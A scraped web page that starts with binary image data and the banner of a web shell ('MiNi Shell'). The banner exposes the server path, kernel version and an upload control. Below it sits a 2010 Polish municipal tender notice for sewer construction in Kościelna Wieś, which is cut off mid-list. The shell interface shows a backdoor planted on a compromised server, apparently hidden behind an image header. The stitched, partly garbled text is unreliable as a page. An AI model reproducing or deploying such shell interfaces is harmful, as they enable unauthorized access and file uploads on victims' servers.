JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/113133-N-2010.html

<p class="kh_header"><b>Gołuchów: Budowa kanalizacji sanitarnej w miejscowości Kościelna Wieś 
zlewnia A, B, C, E</b><br>
<b>Numer ogłoszenia: 113133 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gołuchów , ul. Lipowa 1, 63-322 Gołuchów, tel. 062 7617017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w miejscowości Kościelna Wieś 
zlewnia A, B, C, E.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)  Przedmiotem zamówienia jest: 
Budowa kanalizacji sanitarnej w miejscowości Kościelna Wieś 
zlewnia A, B, C, E
Lokalizacja zamówienia: gmina Gołuchów, miejscowość Kościelna Wieś

Projekt jest współfinansowany ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach działania Podstawowe usługi dla gospodarki ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013.
Zakres rzeczowy obejmuje wykonanie niżej wymienionych elementów:
ZLEWNIA A 
1. Element rozliczeniowy K-1A; kanał grawitacyjny PVC-U O 200 mm - L= 427 m
2. Element rozliczeniowy K-2A;kanał grawitacyjny PVC-U O 200 mm - L= 91 m
3. Element rozliczeniowy K-3A; kanał grawitacyjny PVC-U O 200 mm - L= 362 m
4. Element rozliczeniowy K-4A; kanał grawitacyjny PVC-U O 200 mm - L= 251 m
5. Element rozliczeniowy K-5A; kanał grawitacyjny PVC-U O 200 mm - L= 152 m
6. Element rozliczeniowy K-5.1A; kanał grawitacyjny PVC-U O 160 mm - L= 31 m
7. Element rozliczeniowy K-6A; kanał grawitacyjny PVC-U O 200 mm - L= 83 m
8. Element rozliczeniowy K-7A; kanał grawitacyjny PVC-U O 160 mm - L= 94 m
9. Element rozliczeniowy K-8A; kanał grawitacyjny PVC-U O 200 mm - L= 229 m
10. Element rozliczeniowy K-9A; kanał grawitacyjny PVC-U O 160 mm - L= 14 m
11. Element rozliczeniowy K-10A; kanał grawitacyjny PVC-U O 200 mm - L= 227 m
12. Element rozliczeniowy K-11A; kanał grawitacyjny PVC-U O 200 mm - L= 188 m
13. Element rozliczeniowy K-11.1A; kanał grawitacyjny PVC-U O 200 mm - L= 154 m
14. Element rozliczeniowy K-11.2A; kanał grawitacyjny PVC-U O 160 mm - L= 58 m
15. Element rozliczeniowy K-12A; kanał grawitacyjny PVC-U O 200 mm - L= 909 m
16. Element rozliczeniowy K-13A; kanał grawitacyjny PVC-U O 200 mm - L= 132 m
17. Element rozliczeniowy K-14A; kanał grawitacyjny PVC-U O 200 mm - L= 209 m
18. Element rozliczeniowy K-14.1A; kanał grawitacyjny PVC-U O 160 mm - L= 88 m
19. Element rozliczeniowy K-14.2A; kanał grawitacyjny PVC-U O 160 mm - L= 53 m
20. Element rozliczeniowy K-15A; kanał grawitacyjny PVC-U O 200 mm - L= 237 m
21. Element rozliczeniowy K-16A; kanał grawitacyjny PVC-U O 200 mm - L= 129 m
22. Element rozliczeniowy K-17A; kanał grawitacyjny PVC-U O 200 mm - L= 59 m
23. Element rozliczeniowy K-18A; kanał grawitacyjny PVC-U O 160 mm - L= 39 m
24. Element rozliczeniowy K-19A; kanał grawitacyjny PVC-U O 200 mm - L= 327 m
25. Element rozliczeniowy K- 22A; kanał grawitacyjny PVC-U O 160 mm - L= 103 m
26. Element rozliczeniowy W-A; włączenie studni rozprężnej SR1A do komory K 40 z rury typu Hobas o średnicy O 200 mm (włączenie nr 1)
27. Element rozliczeniowy T-1A; przewód tłoczny  Dz 110 mm PE - L=1570 m
28. Element rozliczeniowy T- 2A; przewód tłoczny Dz 110 mm PE - L=5 m
29. Element rozliczeniowy T- 3A; przewód tłoczny Dz 90 mm PE - L=192 m
30. Element rozliczeniowy T- 5A; przewód tłoczny Dz 90 mm PE - L=76 m
31. Element rozliczeniowy T-1pA; przewód tłoczny Dz 63 mm PE - L=35 m
32. Element rozliczeniowy P-1A; przepompownia typu 07 HM 2036/CP3127/80 - 2 - P z pompami typu CP 3152.181 SH/264 o mocy 15,00 kW 2929 obr/min, Q=9,9 l/s, H=54,40 m oraz zasilaniem przepompowni 
33. Element rozliczeniowy P-2A; przepompownia typu 07 HM 1537/DP3127/80 - 2 - P z pompami typu DP 3080.211 HT/234 o mocy 5,50 kW 2760 obr/min, Q=7,6 l/s, H=18,60 m oraz zasilaniem przepompowni i centralą do sterowania monitoringu
34. Element rozliczeniowy P-3A; przepompownia typu 07 HM 1230/CP3045/65 - 2 - P z pompami typu CP 3045.181 HT/250 o mocy 1,20 kW 2785 obr/min, Q=4,1 l/s, H=9,90 m oraz zasilaniem przepompowni
35. Element rozliczeniowy P-5A; przepompownia typu 07 HM 1229/CP3057/65 - 2 - P z pompami typu CP 3157.181 HT/266 o mocy 1,70 kW 2700 obr/min, Q=4,2 l/s, H=9,80 m oraz zasilaniem przepompowni
36. Element rozliczeniowy Pd-1A; przepompownia typu 07 HM 1028/MP3068/50 - 1 - P z pompami typu MP 3068.170 HT/214 o mocy 1,70 kW 2700 obr/min, Q=2,0 l/s, H=18,60 m oraz zasilaniem przepompowni
37. Element rozliczeniowy: Przykanaliki O 160 mm, o łącznej długości L = 460 m, studzienki przyłączeniowe O 400 mm - 85 szt.
ZLEWNIA B
38. Element rozliczeniowy K -1B; kanał grawitacyjny PVC-U O 200 mm - L= 577 m
39. Element rozliczeniowy K -2B; kanał grawitacyjny PVC-U O 200 mm - L= 158 m
40. Element rozliczeniowy K -2.1B; kanał grawitacyjny PVC-U O 160 mm - L= 6 m
41. Element rozliczeniowy K -3B; kanał grawitacyjny PVC-U O 200 mm - L= 165 m
42. Element rozliczeniowy K -4B; kanał grawitacyjny PVC-U O 160 mm - L= 101 m
43. Element rozliczeniowy K-5B; kanał grawitacyjny PVC-U O 200 mm - L= 67 m
44. Element rozliczeniowy K-6B; kanał grawitacyjny PVC-U O 160 mm - L= 107 m
45. Element rozliczeniowy K-7B; kanał grawitacyjny PVC-U O 200 mm - L= 156 m
46. Element rozliczeniowy K-8B; kanał grawitacyjny PVC-U O 200 mm - L= 251 m
47. Element rozliczeniowy K-9B; kanał grawitacyjny PVC-U O 200 mm - L= 144 m (odcinek od studni S35 do studni S44)
48. Element rozliczeniowy K-10B; kanał grawitacyjny PVC-U O 200 mm - L= 50 m
49. Element rozliczeniowy K-11B; kanał grawitacyjny PVC-U O 200 mm - L= 231 m
50. Element rozliczeniowy K-12B; kanał grawitacyjny PVC-U O 200 mm - L= 162 m
51. Element rozliczeniowy K-13B; kanał grawitacyjny PVC-U O 160 mm - L= 18 m
52. Element rozliczeniowy K-14B; kanał grawitacyjny PVC-U O 200 mm - L= 211 m (odcinek od studni S62 do studni S72)
53. Element rozliczeniowy K-15B; kanał grawitacyjny PVC-U O 200 mm - L= 153 m i O 160 mm, L= 31 m
54. Element rozliczeniowy K-16B; kanał grawitacyjny PVC-U O 200 mm - L= 229 m
55. Element rozliczeniowy K-17B; kanał grawitacyjny PVC-U O 160 mm - L= 25 m
56. Element rozliczeniowy K-18B; kanał grawitacyjny PVC-U O 160 mm - L= 63 m
57. Element rozliczeniowy K-19B; kanał grawitacyjny PVC-U O 200 mm - L= 274 m
58. Element rozliczeniowy K-20B; kanał grawitacyjny PVC-U O 200 mm - L= 236 m
59. Element rozliczeniowy K-21B; kanał grawitacyjny PVC-U O 200 mm - L= 232 m
60. Element rozliczeniowy K-22B; kanał grawitacyjny PVC-U O 200 mm - L= 417 m (odcinek od studni S 20 do studni S120)
61. Element rozliczeniowy K-23B; kanał grawitacyjny PVC-U O 200 mm - L= 80 m
62. Element rozliczeniowy K-24B; kanał grawitacyjny PVC-U O 200 mm - L= 360 m
63. Element rozliczeniowy K-25B; kanał grawitacyjny PVC-U O 200 mm - L= 122 m
64. Element rozliczeniowy T-1B; przewód tłoczny Dz 90 mm PE - L=215 m
65. Element rozliczeniowy T-2B; przewód tłoczny Dz 90 mm PE - L=60 m
66. Element rozliczeniowy T-3B; przewód tłoczny Dz 90 mm PE - L=66 m
67. Element rozliczeniowy T-4B; przewód tłoczny Dz 90 mm PE - L= 26 m
68. Element rozliczeniowy T-5B; przewód tłoczny Dz 90 mm PE - L=10 m
69. Element rozliczeniowy P-1B; przepompownia typu 07 HM 2045/CP3068/80 - 2 - P z pompami typu CP 3068.180 HT/255 o mocy 2,40 kW 2705 obr/min, Q=4,0 l/s, H=12,00 m oraz zasilaniem przepompowni
70. Element rozliczeniowy P-2B; rzepompownia typu 07 HM 1230/DP3045/65 - 2 - P z pompami typu DP 3045.181 MT/230 o mocy 1,20 kW 2785 obr/min, Q=4,2 l/s, H=7,60 m oraz zasilaniem przepompowni
71. Element rozliczeniowy P-3B; przepompownia typu 07 HM 1244/CP3045/65 - 2 - P z pompami typu CP 3045.181 HT/252 o mocy 1,20 kW 2785 obr/min, Q=4,1 l/s, H=5,90 m oraz zasilaniem przepompowni
72. Element rozliczeniowy P-4B; przepompownia typu 07 HM 1245/CP3068/65 - 2 - P z pompami typu CP 3068.180 HT/255 o mocy 1,70 kW 2700 obr/min, Q=4,3 l/s, H=11,40 m oraz zasilaniem przepompowni
73. Element rozliczeniowy P-5B; przepompownia typu 07 HM 1229/CP3085/80 - 2 - P z pompami typu CP 3085.183 MT/434 o mocy 2,00 kW 1415 obr/min, Q=4,1 l/s, H=7,40 m oraz zasilaniem przepompowni
74. Element rozliczeniowy: Przykanaliki O 160 mm, o łącznej długości L = 694 m,  studzienki przyłączeniowe O 400 mm - 107 szt.
ZLEWNIA C
75. Element rozliczeniowy W-C; włączenie do istniejącego kolektora - wklejenie siodła 1400 x 200 (włączenie nr 2)
76. Element rozliczeniowy K-1C; kanał grawitacyjny PVC-U O 200 mm - L= 470 m
77. Element rozliczeniowy K-2C; kanał grawitacyjny PVC-U O 200 mm - L= 336 m
78. Element rozliczeniowy K-3C; kanał grawitacyjny PVC-U O 200 mm - L= 243 m
79. Element rozliczeniowy K-4C; kanał grawitacyjny PVC-U O 200 mm - L= 228 m
80. Element rozliczeniowy K-5C; kanał grawitacyjny PVC-U O 200 mm - L= 264 m
81. Element rozliczeniowy K-6C; kanał grawitacyjny PVC-U O 200 mm - L= 309 m
82. Element rozliczeniowy K-7C; kanał grawitacyjny PVC-U O 200 mm - L= 565 m
83. Element rozliczeniowy T-1C; przewód tłoczny Dz 90 mm PE - L=28 m
84. Element rozliczeniowy T-2C; przewód tłoczny Dz 90 mm PE - L=304 m
85. Element rozliczeniowy T-3C; przewód tłoczny Dz 90 mm PE - L=328 m
86. Element rozliczeniowy T-4C; przewód tłoczny Dz 90 mm PE - L=652 m
87. Element rozliczeniowy P-1C; przepompownia typu 07 HM 1245/CP3057/65 - 2 - P z pompami typu CP 3057.181 HT/266 o mocy 1,70 kW 2700 obr/min, Q=4,3 l/s, H=9,70 m oraz zasilaniem przepompowni
88. Element rozliczeniowy P-2C; przepompownia typu 07 HM 1241/CP3068/80 - 2 - P z pompami typu CP 3068.180 HT/255 o mocy 1,70 kW 2700 obr/min, Q=4,3 l/s, H=11,40 m oraz zasilaniem przepompowni
89. Element rozliczeniowy P-3C; przepompownia typu 07 HM 1237/CP3068/80 - 2 - P z pompami typu CP 3068.180 HT/255 o mocy 1,70 kW 2700 obr/min, Q=4,3 l/s, H=11,40 m oraz zasilaniem przepompowni
90. Element rozliczeniowy P-4C; przepompownia typu 07 HM 1233/CP3068/80 - 2 - P z pompami typu CP 3068.180 HT/251 o mocy 2,40 kW 2705 obr/min, Q=4,1 l/s, H=18,70 m oraz zasilaniem przepompowni
91. Element rozliczeniowy: Przykanaliki O 160 mm, o łącznej długości L =285,0 m,  studzienki przyłączeniowe O 400 mm - 46 szt.
ZLEWNIA E
92. Element rozliczeniowy W-E; włączenie do istniejącego kolektora - wklejenie siodła 1400 x 200 (włączenie nr 3)
93. Element rozliczeniowy K-1E; kanał grawitacyjny PVC-U O 200 mm - L= 656 m
94. Element rozliczeniowy K-2E; kanał grawitacyjny PVC-U O 200 mm - L= 234 m
95. Element rozliczeniowy K-3E; kanał grawitacyjny PVC-U O 200 mm - L= 212 m
96. Element rozliczeniowy K-4E; kanał grawitacyjny PVC-U O 160 mm - L= 58 m
97. Element rozliczeniowy Przykanaliki O 160 mm; o łącznej długości L= 175 m,  studzienki przyłączeniowe O 400 mm - 21 szt.

Zakres rzeczowy zamówienia (określony w tabeli) nie obejmuje całego zakresu zlewni A i zlewni B ujętego w dokumentacji projektowej. 
 2) Oznaczenie wg Wspólnego Słownika Zamówień: 
CPV 45.11.12.00-0; Wytyczenie trasy i punktów wysokościowych
CPV 45.23.13.40-2; Rozbiórka elementów dróg
CPV 45.11.25.00-0; Roboty ziemne 
CPV 45.23.24.10-9; Kanalizacja sanitarna
CPV 45.23.24.23-3; Roboty budowlane w zakresie przepompowni ścieków
CPV 45.23.31.42-6; Odtworzenie nawierzchni
Szczegółowy opis zamówienia zawiera dokumentacja projektowa. Prace objęte przedmiotem zamówienia muszą być wykonanie zgodnie ze specyfikacją techniczną wykonania i odbioru robót.
3) Uwaga:
- ilekroć w projekcie budowlano - wykonawczym, specyfikacji technicznej, wskazano markę lub pochodzenie produktu lub urządzenia, należy przyjąć że za każdą nazwą jest umieszczone słowo  lub równoważne, tzn. że wbudowane materiały, urządzenia itp. będą posiadały (charakteryzowały się) wszystkimi parametrami nie gorszymi niż opisane w w/w dokumentach.
Wskazane produkty lub urządzenia posłużyły do dokonania obliczeń parametrów technicznych oraz rozmieszczenia urządzeń.
Wykonawca, który powołuje się na rozwiązania równoważne w stosunku do opisanych przez Zamawiającego, jest zobowiązany wykazać, że oferowane przez niego dostawy, usługi i roboty budowlane spełniają wymagania określone przez Zamawiającego. 
4) Okres gwarancji udzielonej przez Wykonawcę musi wynosić co najmniej 36 miesięcy. Ustala się okres rękojmi równy okresowi gwarancji.
5) Planowana inwestycja położona jest na obszarze objętym ochroną konserwatorską. Zamawiający zapewni nadzór konserwatorski przy robotach budowlanych.
6) Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
W przypadku, gdy Wykonawca nie dokona w/w wskazania Zamawiający uzna, iż cały zakres robót określony w SIWZ Wykonawca będzie wykonywał osobiście bez pomocy podwykonawców.
Jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, musi załączyć do oferty wypełniony druk Informacja o podwykonawcach stanowiący załącznik nr 11 do niniejszej specyfikacji.
Zlecenie przez Wykonawcę części robót podwykonawcom nie zwalnia Wykonawcy od odpowiedzialności za wykonanie całości robót.
UWAGA !
Jeżeli Wykonawca powierzy wykonanie części zamówienia podwykonawcy, Zamawiający wymaga, aby Wykonawca dokonał na rzecz tego podwykonawcy przelewu (cesji) swojej wierzytelności w zakresie zapłaty przez Zamawiającego wynagrodzenia  za roboty wykonane przez podwykonawcę. Przedstawienie w/w umowy przelewu wierzytelności będzie warunkiem przystąpienia przez Zamawiającego do rozliczenia robót.
- Wykaz podwykonawców przewidzianych do wykonania zamówienia - wzór załącznik nr 11.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.13.40-2, 45.11.25.00-0, 45.23.24.10-9, 45.23.24.23-3, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 80.000,00 zł, słownie: osiemdziesiąt tysięcy złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności wg załącznik nr 2 do SIWZ - pkt 1).
Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia wg załącznik nr 2 do SIWZ - pkt 2).
W postępowaniu mogą wziąć udział Wykonawcy, którzy wykonali w okresie ostatnich pięciu lat  przed upływem terminu składania ofert lub w okresie prowadzenia działalności, jeżeli jest ona prowadzona przez krótszy okres, co najmniej 1 robotę budowlaną polegające na budowie kanalizacji sanitarnej grawitacyjnej i tłocznej z przepompowniami o całkowitej  wartości nie mniejszej niż 2,0 mln zł; 
W celu potwierdzenia warunku posiadania przez wykonawcę niezbędnej  wiedzy i doświadczenia, zamawiający żąda:
1) wykazu robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenie działalności jest krótszy- w tym okresie, z podaniem ich rodzaju i wartości oraz daty i miejsca wykonania (wzór załącznik nr 4 do SIWZ)
2) dokumentów potwierdzających, że roboty budowlane (wymienione w załączniku nr 4) zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje)
Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że dysponuje odpowiednim potęcjałem technicznym oraz osobami zdolnymi do wykonania zamówienia wg załącznik nr 2 do SIWZ - pkt 3).
Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, dysponujący osobami zdolnymi do wykonywania zamówienia, które posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjno - inżynieryjnej w zakresie sieci sanitarnych, w specjalności instalacyjno - inżynieryjnej  w zakresie sieci i instalacji elektrycznych oraz w specjalności drogowej i są członkami właściwej izby samorządu zawodowego.
W celu potwierdzenia warunku dysponowania osobami zdolnymi do wykonywania zamówienia, zamawiający żąda:
1) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia (kierować robotami budowlanymi) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami (wzór załącznik nr 5 do SIWZ)
2) oświadczenia, że osoby wymienione z załączniku nr 5 posiadają wymagane uprawnienia i są członkami właściwej izby samorządu zawodowego.
Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia wg załącznik nr 2 do SIWZ - pkt 4)W postępowaniu mogą brać udział Wykonawcy którzy:
a) osiągnęli w każdym z ostatnich trzech lat obrotowych (lub w okresie działalności jeżeli jest on krótszy) przychody (obroty - pozycja: przychód ze sprzedaży w rachunku zysków i strat) w wysokości co najmniej 6,0 mln zł;
b) posiadają środki finansowe lub zdolność kredytową potwierdzoną przez bank w  
wysokości  nie mniejszej niż 1,5 mln zł;
W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda:
1)  sprawozdania finansowego albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo jego części, a  w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres
2) informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
Zamawiający dokona oceny w/w warunków na podstawie dokumentu załączonego przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
